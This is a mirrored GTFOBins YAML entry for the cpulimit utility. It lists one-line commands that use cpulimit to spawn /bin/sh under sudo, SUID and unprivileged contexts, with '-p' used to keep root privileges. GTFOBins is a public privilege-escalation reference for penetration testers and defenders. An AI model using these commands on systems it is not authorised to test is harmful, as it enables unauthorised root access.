mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-09 15:36:21 +01:00
13 lines
189 B
Plaintext
13 lines
189 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
cpulimit -l 100 -f /bin/sh
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
code: |-
|
|
cpulimit -l 100 -f /bin/sh -p
|
|
unprivileged:
|
|
...
|